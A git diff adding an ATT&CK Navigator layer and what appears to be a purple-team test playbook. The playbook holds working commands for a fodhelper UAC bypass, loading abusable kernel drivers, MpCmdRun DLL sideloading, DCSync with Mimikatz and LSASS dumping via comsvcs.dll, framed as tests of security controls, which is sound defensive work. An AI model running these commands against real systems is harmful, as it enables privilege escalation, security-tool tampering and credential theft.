"T1213.001" + }, + { + "enabled": false, + "techniqueID": "T1213.002" + }, + { + "enabled": false, + "techniqueID": "T1213.003" + }, + { + "enabled": false, + "techniqueID": "T1214" + }, + { + "enabled": false, + "techniqueID": "T1215" + }, + { + "enabled": false, + "techniqueID": "T1216" + }, + { + "enabled": false, + "techniqueID": "T1216.001" + }, + { + "enabled": false, + "techniqueID": "T1217" + }, + { + "showSubtechniques": true, + "techniqueID": "T1218" + }, + { + "enabled": false, + "techniqueID": "T1218.001" + }, + { + "enabled": false, + "techniqueID": "T1218.002" + }, + { + "enabled": false, + "techniqueID": "T1218.003" + }, + { + "enabled": false, + "techniqueID": "T1218.004" + }, + { + "enabled": false, + "techniqueID": "T1218.005" + }, + { + "enabled": false, + "techniqueID": "T1218.007" + }, + { + "enabled": false, + "techniqueID": "T1218.008" + }, + { + "enabled": false, + "techniqueID": "T1218.009" + }, + { + "enabled": false, + "techniqueID": "T1218.010" + }, + { + "color": "#7a34eb", + "techniqueID": "T1218.011" + }, + { + "enabled": false, + "techniqueID": "T1218.012" + }, + { + "enabled": false, + "techniqueID": "T1218.013" + }, + { + "enabled": false, + "techniqueID": "T1218.014" + }, + { + "color": "#7a34eb", + "techniqueID": "T1219" + }, + { + "enabled": false, + "techniqueID": "T1220" + }, + { + "color": "#7a34eb", + "techniqueID": "T1221" + }, + { + "enabled": false, + "techniqueID": "T1222" + }, + { + "enabled": false, + "techniqueID": "T1222.001" + }, + { + "enabled": false, + "techniqueID": "T1222.002" + }, + { + "enabled": false, + "techniqueID": "T1223" + }, + { + "enabled": false, + "techniqueID": "T1480" + }, + { + "enabled": false, + "techniqueID": "T1480.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1482" + }, + { + "enabled": false, + "techniqueID": "T1483" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + 
"techniqueID": "T1484" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.002" + }, + { + "enabled": false, + "techniqueID": "T1485" + }, + { + "color": "#7a34eb", + "techniqueID": "T1486" + }, + { + "enabled": false, + "techniqueID": "T1487" + }, + { + "enabled": false, + "techniqueID": "T1488" + }, + { + "enabled": false, + "techniqueID": "T1489" + }, + { + "color": "#7a34eb", + "techniqueID": "T1490" + }, + { + "enabled": false, + "techniqueID": "T1491" + }, + { + "enabled": false, + "techniqueID": "T1491.001" + }, + { + "enabled": false, + "techniqueID": "T1491.002" + }, + { + "enabled": false, + "techniqueID": "T1492" + }, + { + "enabled": false, + "techniqueID": "T1493" + }, + { + "enabled": false, + "techniqueID": "T1494" + }, + { + "enabled": false, + "techniqueID": "T1495" + }, + { + "enabled": false, + "techniqueID": "T1496" + }, + { + "enabled": false, + "techniqueID": "T1497" + }, + { + "enabled": false, + "techniqueID": "T1497.001" + }, + { + "enabled": false, + "techniqueID": "T1497.002" + }, + { + "enabled": false, + "techniqueID": "T1497.003" + }, + { + "enabled": false, + "techniqueID": "T1498" + }, + { + "enabled": false, + "techniqueID": "T1498.001" + }, + { + "enabled": false, + "techniqueID": "T1498.002" + }, + { + "enabled": false, + "techniqueID": "T1499" + }, + { + "enabled": false, + "techniqueID": "T1499.001" + }, + { + "enabled": false, + "techniqueID": "T1499.002" + }, + { + "enabled": false, + "techniqueID": "T1499.003" + }, + { + "enabled": false, + "techniqueID": "T1499.004" + }, + { + "enabled": false, + "techniqueID": "T1500" + }, + { + "enabled": false, + "techniqueID": "T1501" + }, + { + "enabled": false, + "techniqueID": "T1502" + }, + { + "enabled": false, + "techniqueID": "T1503" + }, + { + "enabled": false, + "techniqueID": "T1504" + }, + { + "enabled": false, + "techniqueID": "T1505" + }, + { + "enabled": false, + "techniqueID": "T1505.001" + }, + { + "enabled": 
false, + "techniqueID": "T1505.002" + }, + { + "enabled": false, + "techniqueID": "T1505.003" + }, + { + "enabled": false, + "techniqueID": "T1505.004" + }, + { + "enabled": false, + "techniqueID": "T1505.005" + }, + { + "enabled": false, + "techniqueID": "T1506" + }, + { + "enabled": false, + "techniqueID": "T1514" + }, + { + "enabled": false, + "techniqueID": "T1518" + }, + { + "enabled": false, + "techniqueID": "T1518.001" + }, + { + "enabled": false, + "techniqueID": "T1519" + }, + { + "enabled": false, + "techniqueID": "T1522" + }, + { + "enabled": false, + "techniqueID": "T1525" + }, + { + "enabled": false, + "techniqueID": "T1526" + }, + { + "enabled": false, + "techniqueID": "T1527" + }, + { + "enabled": false, + "techniqueID": "T1528" + }, + { + "enabled": false, + "techniqueID": "T1529" + }, + { + "enabled": false, + "techniqueID": "T1530" + }, + { + "enabled": false, + "techniqueID": "T1531" + }, + { + "enabled": false, + "techniqueID": "T1534" + }, + { + "enabled": false, + "techniqueID": "T1535" + }, + { + "enabled": false, + "techniqueID": "T1536" + }, + { + "enabled": false, + "techniqueID": "T1537" + }, + { + "enabled": false, + "techniqueID": "T1538" + }, + { + "enabled": false, + "techniqueID": "T1539" + }, + { + "enabled": false, + "techniqueID": "T1542" + }, + { + "enabled": false, + "techniqueID": "T1542.001" + }, + { + "enabled": false, + "techniqueID": "T1542.002" + }, + { + "enabled": false, + "techniqueID": "T1542.003" + }, + { + "enabled": false, + "techniqueID": "T1542.004" + }, + { + "enabled": false, + "techniqueID": "T1542.005" + }, + { + "showSubtechniques": true, + "techniqueID": "T1543" + }, + { + "enabled": false, + "techniqueID": "T1543.001" + }, + { + "enabled": false, + "techniqueID": "T1543.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1543.003" + }, + { + "enabled": false, + "techniqueID": "T1543.004" + }, + { + "enabled": false, + "techniqueID": "T1546" + }, + { + "enabled": false, + "techniqueID": "T1546.001" + }, + 
{ + "enabled": false, + "techniqueID": "T1546.002" + }, + { + "enabled": false, + "techniqueID": "T1546.003" + }, + { + "enabled": false, + "techniqueID": "T1546.004" + }, + { + "enabled": false, + "techniqueID": "T1546.005" + }, + { + "enabled": false, + "techniqueID": "T1546.006" + }, + { + "enabled": false, + "techniqueID": "T1546.007" + }, + { + "enabled": false, + "techniqueID": "T1546.008" + }, + { + "enabled": false, + "techniqueID": "T1546.009" + }, + { + "enabled": false, + "techniqueID": "T1546.010" + }, + { + "enabled": false, + "techniqueID": "T1546.011" + }, + { + "enabled": false, + "techniqueID": "T1546.012" + }, + { + "enabled": false, + "techniqueID": "T1546.013" + }, + { + "enabled": false, + "techniqueID": "T1546.014" + }, + { + "enabled": false, + "techniqueID": "T1546.015" + }, + { + "enabled": false, + "techniqueID": "T1546.016" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "enabled": false, + "techniqueID": "T1547.001" + }, + { + "enabled": false, + "techniqueID": "T1547.002" + }, + { + "enabled": false, + "techniqueID": "T1547.003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.004" + }, + { + "enabled": false, + "techniqueID": "T1547.005" + }, + { + "enabled": false, + "techniqueID": "T1547.006" + }, + { + "enabled": false, + "techniqueID": "T1547.007" + }, + { + "enabled": false, + "techniqueID": "T1547.008" + }, + { + "enabled": false, + "techniqueID": "T1547.009" + }, + { + "enabled": false, + "techniqueID": "T1547.010" + }, + { + "enabled": false, + "techniqueID": "T1547.011" + }, + { + "enabled": false, + "techniqueID": "T1547.012" + }, + { + "enabled": false, + "techniqueID": "T1547.013" + }, + { + "enabled": false, + "techniqueID": "T1547.014" + }, + { + "enabled": false, + "techniqueID": "T1547.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1548" + }, + { + "enabled": false, + "techniqueID": "T1548.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1548.002" + }, + { + 
"enabled": false, + "techniqueID": "T1548.003" + }, + { + "enabled": false, + "techniqueID": "T1548.004" + }, + { + "enabled": false, + "techniqueID": "T1548.005" + }, + { + "enabled": false, + "techniqueID": "T1550" + }, + { + "enabled": false, + "techniqueID": "T1550.001" + }, + { + "enabled": false, + "techniqueID": "T1550.002" + }, + { + "enabled": false, + "techniqueID": "T1550.003" + }, + { + "enabled": false, + "techniqueID": "T1550.004" + }, + { + "enabled": false, + "techniqueID": "T1552" + }, + { + "enabled": false, + "techniqueID": "T1552.001" + }, + { + "enabled": false, + "techniqueID": "T1552.002" + }, + { + "enabled": false, + "techniqueID": "T1552.003" + }, + { + "enabled": false, + "techniqueID": "T1552.004" + }, + { + "enabled": false, + "techniqueID": "T1552.005" + }, + { + "enabled": false, + "techniqueID": "T1552.006" + }, + { + "enabled": false, + "techniqueID": "T1552.007" + }, + { + "enabled": false, + "techniqueID": "T1552.008" + }, + { + "enabled": false, + "techniqueID": "T1553" + }, + { + "enabled": false, + "techniqueID": "T1553.001" + }, + { + "enabled": false, + "techniqueID": "T1553.002" + }, + { + "enabled": false, + "techniqueID": "T1553.003" + }, + { + "enabled": false, + "techniqueID": "T1553.004" + }, + { + "enabled": false, + "techniqueID": "T1553.005" + }, + { + "enabled": false, + "techniqueID": "T1553.006" + }, + { + "enabled": false, + "techniqueID": "T1554" + }, + { + "showSubtechniques": true, + "techniqueID": "T1555" + }, + { + "enabled": false, + "techniqueID": "T1555.001" + }, + { + "enabled": false, + "techniqueID": "T1555.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1555.003" + }, + { + "enabled": false, + "techniqueID": "T1555.004" + }, + { + "enabled": false, + "techniqueID": "T1555.005" + }, + { + "enabled": false, + "techniqueID": "T1555.006" + }, + { + "enabled": false, + "techniqueID": "T1556" + }, + { + "enabled": false, + "techniqueID": "T1556.001" + }, + { + "enabled": false, + "techniqueID": 
"T1556.002" + }, + { + "enabled": false, + "techniqueID": "T1556.003" + }, + { + "enabled": false, + "techniqueID": "T1556.004" + }, + { + "enabled": false, + "techniqueID": "T1556.005" + }, + { + "enabled": false, + "techniqueID": "T1556.006" + }, + { + "enabled": false, + "techniqueID": "T1556.007" + }, + { + "enabled": false, + "techniqueID": "T1556.008" + }, + { + "enabled": false, + "techniqueID": "T1557" + }, + { + "enabled": false, + "techniqueID": "T1557.001" + }, + { + "enabled": false, + "techniqueID": "T1557.002" + }, + { + "enabled": false, + "techniqueID": "T1557.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1558" + }, + { + "enabled": false, + "techniqueID": "T1558.001" + }, + { + "enabled": false, + "techniqueID": "T1558.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1558.003" + }, + { + "enabled": false, + "techniqueID": "T1558.004" + }, + { + "enabled": false, + "techniqueID": "T1559" + }, + { + "enabled": false, + "techniqueID": "T1559.001" + }, + { + "enabled": false, + "techniqueID": "T1559.002" + }, + { + "enabled": false, + "techniqueID": "T1559.003" + }, + { + "enabled": false, + "techniqueID": "T1560" + }, + { + "enabled": false, + "techniqueID": "T1560.001" + }, + { + "enabled": false, + "techniqueID": "T1560.002" + }, + { + "enabled": false, + "techniqueID": "T1560.003" + }, + { + "enabled": false, + "techniqueID": "T1561" + }, + { + "enabled": false, + "techniqueID": "T1561.001" + }, + { + "enabled": false, + "techniqueID": "T1561.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1562" + }, + { + "color": "#7a34eb", + "techniqueID": "T1562.001" + }, + { + "enabled": false, + "techniqueID": "T1562.002" + }, + { + "enabled": false, + "techniqueID": "T1562.003" + }, + { + "enabled": false, + "techniqueID": "T1562.004" + }, + { + "enabled": false, + "techniqueID": "T1562.006" + }, + { + "enabled": false, + "techniqueID": "T1562.007" + }, + { + "enabled": false, + "techniqueID": "T1562.008" + }, + { + 
"enabled": false, + "techniqueID": "T1562.009" + }, + { + "enabled": false, + "techniqueID": "T1562.010" + }, + { + "enabled": false, + "techniqueID": "T1562.011" + }, + { + "enabled": false, + "techniqueID": "T1562.012" + }, + { + "enabled": false, + "techniqueID": "T1563" + }, + { + "enabled": false, + "techniqueID": "T1563.001" + }, + { + "enabled": false, + "techniqueID": "T1563.002" + }, + { + "enabled": false, + "techniqueID": "T1564" + }, + { + "enabled": false, + "techniqueID": "T1564.001" + }, + { + "enabled": false, + "techniqueID": "T1564.002" + }, + { + "enabled": false, + "techniqueID": "T1564.003" + }, + { + "enabled": false, + "techniqueID": "T1564.004" + }, + { + "enabled": false, + "techniqueID": "T1564.005" + }, + { + "enabled": false, + "techniqueID": "T1564.006" + }, + { + "enabled": false, + "techniqueID": "T1564.007" + }, + { + "enabled": false, + "techniqueID": "T1564.008" + }, + { + "enabled": false, + "techniqueID": "T1564.009" + }, + { + "enabled": false, + "techniqueID": "T1564.010" + }, + { + "enabled": false, + "techniqueID": "T1564.011" + }, + { + "enabled": false, + "techniqueID": "T1565" + }, + { + "enabled": false, + "techniqueID": "T1565.001" + }, + { + "enabled": false, + "techniqueID": "T1565.002" + }, + { + "enabled": false, + "techniqueID": "T1565.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "enabled": false, + "techniqueID": "T1566.002" + }, + { + "enabled": false, + "techniqueID": "T1566.003" + }, + { + "enabled": false, + "techniqueID": "T1566.004" + }, + { + "showSubtechniques": true, + "techniqueID": "T1567" + }, + { + "enabled": false, + "techniqueID": "T1567.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1567.002" + }, + { + "enabled": false, + "techniqueID": "T1567.003" + }, + { + "enabled": false, 
+ "techniqueID": "T1567.004" + }, + { + "enabled": false, + "techniqueID": "T1568" + }, + { + "enabled": false, + "techniqueID": "T1568.001" + }, + { + "enabled": false, + "techniqueID": "T1568.002" + }, + { + "enabled": false, + "techniqueID": "T1568.003" + }, + { + "enabled": false, + "techniqueID": "T1569" + }, + { + "enabled": false, + "techniqueID": "T1569.001" + }, + { + "enabled": false, + "techniqueID": "T1569.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1570" + }, + { + "enabled": false, + "techniqueID": "T1571" + }, + { + "enabled": false, + "techniqueID": "T1572" + }, + { + "enabled": false, + "techniqueID": "T1573" + }, + { + "enabled": false, + "techniqueID": "T1573.001" + }, + { + "enabled": false, + "techniqueID": "T1573.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1574" + }, + { + "enabled": false, + "techniqueID": "T1574.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1574.002" + }, + { + "enabled": false, + "techniqueID": "T1574.004" + }, + { + "enabled": false, + "techniqueID": "T1574.005" + }, + { + "enabled": false, + "techniqueID": "T1574.006" + }, + { + "enabled": false, + "techniqueID": "T1574.007" + }, + { + "enabled": false, + "techniqueID": "T1574.008" + }, + { + "enabled": false, + "techniqueID": "T1574.009" + }, + { + "enabled": false, + "techniqueID": "T1574.010" + }, + { + "enabled": false, + "techniqueID": "T1574.011" + }, + { + "enabled": false, + "techniqueID": "T1574.012" + }, + { + "enabled": false, + "techniqueID": "T1574.013" + }, + { + "enabled": false, + "techniqueID": "T1578" + }, + { + "enabled": false, + "techniqueID": "T1578.001" + }, + { + "enabled": false, + "techniqueID": "T1578.002" + }, + { + "enabled": false, + "techniqueID": "T1578.003" + }, + { + "enabled": false, + "techniqueID": "T1578.004" + }, + { + "enabled": false, + "techniqueID": "T1578.005" + }, + { + "enabled": false, + "techniqueID": "T1580" + }, + { + "enabled": false, + "techniqueID": "T1583" + }, + { + "enabled": 
false, + "techniqueID": "T1583.001" + }, + { + "enabled": false, + "techniqueID": "T1583.002" + }, + { + "enabled": false, + "techniqueID": "T1583.003" + }, + { + "enabled": false, + "techniqueID": "T1583.004" + }, + { + "enabled": false, + "techniqueID": "T1583.005" + }, + { + "enabled": false, + "techniqueID": "T1583.006" + }, + { + "enabled": false, + "techniqueID": "T1583.007" + }, + { + "enabled": false, + "techniqueID": "T1583.008" + }, + { + "enabled": false, + "techniqueID": "T1584" + }, + { + "enabled": false, + "techniqueID": "T1584.001" + }, + { + "enabled": false, + "techniqueID": "T1584.002" + }, + { + "enabled": false, + "techniqueID": "T1584.003" + }, + { + "enabled": false, + "techniqueID": "T1584.004" + }, + { + "enabled": false, + "techniqueID": "T1584.005" + }, + { + "enabled": false, + "techniqueID": "T1584.006" + }, + { + "enabled": false, + "techniqueID": "T1584.007" + }, + { + "enabled": false, + "techniqueID": "T1585" + }, + { + "enabled": false, + "techniqueID": "T1585.001" + }, + { + "enabled": false, + "techniqueID": "T1585.002" + }, + { + "enabled": false, + "techniqueID": "T1585.003" + }, + { + "enabled": false, + "techniqueID": "T1586" + }, + { + "enabled": false, + "techniqueID": "T1586.001" + }, + { + "enabled": false, + "techniqueID": "T1586.002" + }, + { + "enabled": false, + "techniqueID": "T1586.003" + }, + { + "enabled": false, + "techniqueID": "T1587" + }, + { + "enabled": false, + "techniqueID": "T1587.001" + }, + { + "enabled": false, + "techniqueID": "T1587.002" + }, + { + "enabled": false, + "techniqueID": "T1587.003" + }, + { + "enabled": false, + "techniqueID": "T1587.004" + }, + { + "enabled": false, + "techniqueID": "T1588" + }, + { + "enabled": false, + "techniqueID": "T1588.001" + }, + { + "enabled": false, + "techniqueID": "T1588.002" + }, + { + "enabled": false, + "techniqueID": "T1588.003" + }, + { + "enabled": false, + "techniqueID": "T1588.004" + }, + { + "enabled": false, + "techniqueID": "T1588.005" + }, + { + 
"enabled": false, + "techniqueID": "T1588.006" + }, + { + "enabled": false, + "techniqueID": "T1589" + }, + { + "enabled": false, + "techniqueID": "T1589.001" + }, + { + "enabled": false, + "techniqueID": "T1589.002" + }, + { + "enabled": false, + "techniqueID": "T1589.003" + }, + { + "enabled": false, + "techniqueID": "T1590" + }, + { + "enabled": false, + "techniqueID": "T1590.001" + }, + { + "enabled": false, + "techniqueID": "T1590.002" + }, + { + "enabled": false, + "techniqueID": "T1590.003" + }, + { + "enabled": false, + "techniqueID": "T1590.004" + }, + { + "enabled": false, + "techniqueID": "T1590.005" + }, + { + "enabled": false, + "techniqueID": "T1590.006" + }, + { + "enabled": false, + "techniqueID": "T1591" + }, + { + "enabled": false, + "techniqueID": "T1591.001" + }, + { + "enabled": false, + "techniqueID": "T1591.002" + }, + { + "enabled": false, + "techniqueID": "T1591.003" + }, + { + "enabled": false, + "techniqueID": "T1591.004" + }, + { + "enabled": false, + "techniqueID": "T1592" + }, + { + "enabled": false, + "techniqueID": "T1592.001" + }, + { + "enabled": false, + "techniqueID": "T1592.002" + }, + { + "enabled": false, + "techniqueID": "T1592.003" + }, + { + "enabled": false, + "techniqueID": "T1592.004" + }, + { + "enabled": false, + "techniqueID": "T1593" + }, + { + "enabled": false, + "techniqueID": "T1593.001" + }, + { + "enabled": false, + "techniqueID": "T1593.002" + }, + { + "enabled": false, + "techniqueID": "T1593.003" + }, + { + "enabled": false, + "techniqueID": "T1594" + }, + { + "enabled": false, + "techniqueID": "T1595" + }, + { + "enabled": false, + "techniqueID": "T1595.001" + }, + { + "enabled": false, + "techniqueID": "T1595.002" + }, + { + "enabled": false, + "techniqueID": "T1595.003" + }, + { + "enabled": false, + "techniqueID": "T1596" + }, + { + "enabled": false, + "techniqueID": "T1596.001" + }, + { + "enabled": false, + "techniqueID": "T1596.002" + }, + { + "enabled": false, + "techniqueID": "T1596.003" + }, + { + 
"enabled": false, + "techniqueID": "T1596.004" + }, + { + "enabled": false, + "techniqueID": "T1596.005" + }, + { + "enabled": false, + "techniqueID": "T1597" + }, + { + "enabled": false, + "techniqueID": "T1597.001" + }, + { + "enabled": false, + "techniqueID": "T1597.002" + }, + { + "enabled": false, + "techniqueID": "T1598" + }, + { + "enabled": false, + "techniqueID": "T1598.001" + }, + { + "enabled": false, + "techniqueID": "T1598.002" + }, + { + "enabled": false, + "techniqueID": "T1598.003" + }, + { + "enabled": false, + "techniqueID": "T1598.004" + }, + { + "enabled": false, + "techniqueID": "T1599" + }, + { + "enabled": false, + "techniqueID": "T1599.001" + }, + { + "enabled": false, + "techniqueID": "T1600" + }, + { + "enabled": false, + "techniqueID": "T1600.001" + }, + { + "enabled": false, + "techniqueID": "T1600.002" + }, + { + "enabled": false, + "techniqueID": "T1601" + }, + { + "enabled": false, + "techniqueID": "T1601.001" + }, + { + "enabled": false, + "techniqueID": "T1601.002" + }, + { + "enabled": false, + "techniqueID": "T1602" + }, + { + "enabled": false, + "techniqueID": "T1602.001" + }, + { + "enabled": false, + "techniqueID": "T1602.002" + }, + { + "enabled": false, + "techniqueID": "T1606" + }, + { + "enabled": false, + "techniqueID": "T1606.001" + }, + { + "enabled": false, + "techniqueID": "T1606.002" + }, + { + "enabled": false, + "techniqueID": "T1608" + }, + { + "enabled": false, + "techniqueID": "T1608.001" + }, + { + "enabled": false, + "techniqueID": "T1608.002" + }, + { + "enabled": false, + "techniqueID": "T1608.003" + }, + { + "enabled": false, + "techniqueID": "T1608.004" + }, + { + "enabled": false, + "techniqueID": "T1608.005" + }, + { + "enabled": false, + "techniqueID": "T1608.006" + }, + { + "enabled": false, + "techniqueID": "T1609" + }, + { + "enabled": false, + "techniqueID": "T1610" + }, + { + "enabled": false, + "techniqueID": "T1611" + }, + { + "enabled": false, + "techniqueID": "T1612" + }, + { + "enabled": false, 
+ "techniqueID": "T1613" + }, + { + "enabled": false, + "techniqueID": "T1614" + }, + { + "enabled": false, + "techniqueID": "T1614.001" + }, + { + "enabled": false, + "techniqueID": "T1615" + }, + { + "enabled": false, + "techniqueID": "T1619" + }, + { + "enabled": false, + "techniqueID": "T1620" + }, + { + "color": "#7a34eb", + "techniqueID": "T1621" + }, + { + "enabled": false, + "techniqueID": "T1622" + }, + { + "enabled": false, + "techniqueID": "T1647" + }, + { + "enabled": false, + "techniqueID": "T1648" + }, + { + "enabled": false, + "techniqueID": "T1649" + }, + { + "enabled": false, + "techniqueID": "T1650" + }, + { + "enabled": false, + "techniqueID": "T1651" + }, + { + "enabled": false, + "techniqueID": "T1652" + }, + { + "enabled": false, + "techniqueID": "T1653" + }, + { + "enabled": false, + "techniqueID": "T1654" + }, + { + "enabled": false, + "techniqueID": "T1656" + }, + { + "enabled": false, + "techniqueID": "T1657" + }, + { + "enabled": false, + "techniqueID": "T1659" + } + ] +} \ No newline at end of file diff --git a/rh-index-2024/rh-index-2024-v1.0-notebook.md b/rh-index-2024/rh-index-2024-v1.0-notebook.md new file mode 100644 index 0000000..938c570 --- /dev/null +++ b/rh-index-2024/rh-index-2024-v1.0-notebook.md 
@@ -0,0 +1,425 @@ +# General + +# Initial Access + +## MFA Push Spam - General guidance + +Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests. + +Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation. + +### Guidance + +Send at least 10 MFA requests to the target user + +### Notes + +- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked. + +## Malicious ISOs - Generic ISO-wrapped payload + +ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions + +Use an ISO to deliver a malicious executable payload + +### Prerequisites + +1. Payload +1. ISO containing the payload + 1. You can use `mkisofs` to create an ISO: + ``` + bash> mkisofs -J -o {{ iso }} {{ payload }} + ``` + +## Suspicious connections - General guidance + +### Guidance + +When using a browser, you can override the user agent string by using an extension. For example: + +- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher +- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg + +You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation. + +## Suspicious connections - General guidance + +### Guidance + +When using a browser, you can override the user agent string by using an extension. 
For example: + +- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher +- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg + +You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation. + +# Execution + +# Defense Evasion + +## Malicious kernel driver use - load known-abusable driver + +Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools. + +This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote. + +### Prerequisites + +- Local admin +- A known-abusable driver. Examples: + - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)** + - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd) + - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b) + +### Guidance + +Example loading using sc.exe + +``` +cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }} +``` + +### Cleanup + +- Is using sc.exe, stop and delete the service then restart the machine + +### Notes + +Drivers can be found in multiple places, including: + +- Directly from vendor sites +- VirusTotal +- Aggregators like LOLDrivers and KDU + - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers + - KDU: https://github.com/hfiref0x/KDU/ + +## DLL Side Loading - General guidance + +### Notes + +- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/ + +## DLL Search Order Hijacking - MpCmdRun.exe sideloading + +MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll + +### Prerequisites + +- A DLL with the appropriate exports called `mpclient.dll` + - Use: 
https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient + +### Guidance + +Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe` + +## UAC Bypass - via fodhelper.exe + +User Account Control is not a security control but can cause issues with execution when attempting privileged operations + +Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC. + +### Prerequisites + +- Split-token admin account + +### Guidance + +Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution. + +``` +cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command +``` + +Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt: + +``` +cmd> +reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f +reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f +reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f +c:\windows\system32\fodhelper.exe +``` + +### Cleanup + +If the registry existed prior to execution, restore its value: + +``` +cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f +``` + +Otherwise, delete the key: + +``` +cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f +``` + +### References + +- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/ +- https://4pfsec.com/offensive-windows-fodhelper-exe/ + +## Conditional Access Policy Modifications - General guidance + +### Notes + +- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it. 
+ +# Discovery + +# Command and Control + +## Remote Assistance Software - General guidance + +Access via remote assistance software + +Select and use a well-known remote assistance software + +### Prerequisites + +1. An account for the service +2. Tool client downloaded and installed + 1. TeamViewer: https://www.teamviewer.com/ + 2. GoTo Resolve: https://www.goto.com/it-management/resolve + 3. ConnectWise Control: https://control.connectwise.com/ + +### Notes + +- Where possible, use remote assistance software already in use in the environment + +## Remote tool download - General guidance + +Transfer tool into environment by downloading from the Internet + +### Notes + +- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice. 
+ +# Collection + +# Credential Access + +## DCSync - via Mimikatz + +The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials + +Uses Mimikatz's lsadump::dcsync command + +### Prerequisites + +- Command execution in the context of an account with Active Directory replication rights +- User accounts to target +- Mimikatz binary (https://github.com/gentilkiwi/mimikatz) + +### Guidance + +``` +mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }} +``` + +### Troubleshooting + +If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following: + +``` +cmd> klist purge +cmd> gpupdate /force +``` + +## LSASS dumping using comsvcs.dll - via rundll32.exe + +Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll` + +### Prerequisites + +- Administrator rights +- SeDebugPrivilege + +### Guidance + +``` +shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full +``` + +This command must be run from a shell process that has `SeDebugPrivilege` enabled. +PowerShell should work to this end. + +You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`). +Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`) + +### Cleanup + +- Delete the dump file + +# Impact + +## GPO Modifications - General guidance + +### Notes + +- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it. 
